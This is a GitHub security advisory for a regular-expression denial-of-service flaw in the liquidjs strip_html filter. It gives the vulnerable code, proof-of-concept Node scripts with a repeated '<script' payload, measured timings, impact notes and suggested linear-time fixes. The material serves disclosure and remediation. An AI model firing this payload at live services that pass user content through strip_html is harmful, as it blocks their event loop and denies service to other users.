LiquidJS Vulnerable to ReDoS via Quadratic Backtracking in `strip_html` Filter Regex

Summary

The built-in strip_html filter in liquidjs uses a regex containing four lazy-quantified alternatives. When the input contains many <script, <style, or <!-- opener tokens without matching closers, the V8 regex engine performs O(N²) backtracking, blocking the Node.js event loop. A single ~350 KB request ('<script'.repeat(50000)) stalls the process for ~10 seconds; cost grows quadratically with input size. The default memoryLimit: Infinity does not bound regex CPU, and even when configured strip_html only charges str.length to the limit — the regex itself runs unbounded.

Details

The vulnerable filter is at src/filters/html.ts:45-49:

export function strip_html (this: FilterImpl, v: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)
  return str.replace(/<script[\s\S]*?<\/script>|<style[\s\S]*?<\/style>|<.*?>|<!--[\s\S]*?-->/g, '')
}

The regex contains four lazy patterns:

<script[\s\S]*?<\/script>
<style[\s\S]*?<\/style>
<.*?>

For an input like '<script'.repeat(N), the engine encounters N starting < positions. At each one it must lazily expand [\s\S]*? (and .*?) all the way to end-of-input searching for a closer that never appears, then fail and backtrack. Because each of the O(N) starts performs O(N) lazy-expansion work, total work is O(N²).

Reachability:

strip_html is a default-registered filter (exported from src/filters/html.ts, wired up via src/filters/index.ts), invocable from any template via {{ x | strip_html }}.
The filter calls String.prototype.replace with the vulnerable regex directly on the caller-supplied string, with no length cap and no timeout.
The default memoryLimit is Infinity (src/liquid-options.ts:198); the filter only charges str.length against memory (line 47), which does not bound CPU work for regex backtracking.

This is distinct from GHSA-45rm-2893-5f49 (prototype property leak, CWE-200) and from any prior replace/strip_html issues — the mechanism here is regex backtracking CPU consumption on a different filter.

PoC

Empirical scaling confirmed against a freshly built liquidjs@10.25.7 bundle on Node 22 / Linux:

node -e "
const { Liquid } = require('liquidjs');
const e = new Liquid();
(async () => {
  for (const n of [1000, 2000, 4000, 8000, 16000]) {
    const payload = '<script'.repeat(n);
    const t0 = Date.now();
    await e.parseAndRender('{{ x | strip_html }}', { x: payload });
    console.log('n=' + n + ' inputLen=' + payload.length + ' ms=' + (Date.now() - t0));
  }
})();
"

Verified output:

n=1000  inputLen=7000   ms=5
n=2000  inputLen=14000  ms=12     (2.4x for 2x size)
n=4000  inputLen=28000  ms=46     (3.8x for 2x size)
n=8000  inputLen=56000  ms=187    (4.0x for 2x size)
n=16000 inputLen=112000 ms=737    (3.9x for 2x size)

A larger payload extrapolates straightforwardly:

node -e "
const { Liquid } = require('liquidjs');
const e = new Liquid();
(async () => {
  const payload = '<script'.repeat(50000);  // 350 KB
  const t0 = Date.now();
  await e.parseAndRender('{{ x | strip_html }}', { x: payload });
  console.log('elapsed ms:', Date.now() - t0);
})();
"
# elapsed ms: ~10000+ (Node single-threaded event loop fully blocked)

The same pathology applies to <style and <!-- openers.

Impact

Single-request DoS: A 350 KB request body stalls the Node.js event loop for ~10 seconds; 700 KB takes ~40 s; 1.4 MB takes ~160 s. All other requests on the process queue behind the regex.
Trivial amplification: Quadratic scaling means small attacker bandwidth produces large server CPU consumption. A handful of concurrent requests fully saturates the worker.
No authentication required: The typical use case for strip_html is sanitizing untrusted input (comments, posts, profile bios, product descriptions). Any endpoint that renders user content through strip_html is exposed.
memoryLimit doesn't help: Even applications that opt into memoryLimit are not protected, because (a) the regex CPU runs to completion before any output is produced, and (b) only str.length is charged, not the cost of the regex traversal.

Recommended Fix

Replace the backtracking regex with an atomic / non-overlapping pattern, and/or perform a single linear pass.

Option 1 — anchor each alternative so lazy expansion fails fast on chunked content (no [\s\S]*? over the full tail):

return str.replace(
  /<script\b[^<]*(?:<(?!\/script>)[^<]*)*<\/script>|<style\b[^<]*(?:<(?!\/style>)[^<]*)*<\/style>|<!--[^-]*(?:-(?!->)[^-]*)*-->|<[^>]*>/g,
  ''
)

This unrolls each lazy quantifier so each < is visited at most a constant number of times overall — linear total work.

Option 2 — single-pass tokenizer in plain code; iterate over the string once, tracking whether you are inside <script>, <style>, comment, or generic tag, and emit nothing for those ranges.

Either fix should be combined with charging the regex output cost honestly to memoryLimit and (defensively) capping input length up front:

export function strip_html (this: FilterImpl, v: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)
  // ... linear-time strip implementation here
}

References

harttle published to harttle/liquidjs May 24, 2026

Published to the GitHub Advisory Database May 27, 2026

Reviewed May 27, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Recommended Fix

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

EPSS score

Exploit Prediction Scoring System (EPSS)

Weaknesses

Inefficient Regular Expression Complexity

CVE ID

GHSA ID

Source code

Credits

Uh oh!